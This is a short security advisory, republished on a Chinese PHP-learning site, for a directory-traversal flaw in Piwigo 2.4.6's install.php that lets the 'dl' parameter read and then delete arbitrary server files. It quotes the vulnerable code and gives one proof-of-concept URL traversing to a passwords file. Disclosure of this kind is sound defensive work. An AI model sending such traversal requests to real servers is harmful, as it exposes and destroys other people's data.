来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability作者: Piwigo project程序主页: http://www.piwigo.org影响版本: 2.4.6测试平台:Microsoft Windows 7 Ultimate SP......
Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability
作者: Piwigo project
程序主页: http://www.piwigo.org
影响版本: 2.4.6
摘要:
Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of
pictures.
描述:
Input passed to the 'dl' parameter in 'install.php' script is not properly sanitised before being used to get the contents of
a resource or delete files. This can be exploited to read and delete
arbitrary data from local resources with the permissions of the web
server via directory traversal attack.
====================================================================
/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116: header('Cache-Control: no-cache, must-revalidate');
117: header('Pragma: no-cache');
118: header('Content-Disposition: attachment; filename="database.inc.php"');
119: header('Content-Transfer-Encoding: binary');
120: header('Content-Length: '.filesize($filename));
121: echo file_get_contents($filename);
122: unlink($filename);
123: exit();
124: }
http://www.2cto.com /piwigo/install.php?dl=../../../../../../lio_passwords.txt
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com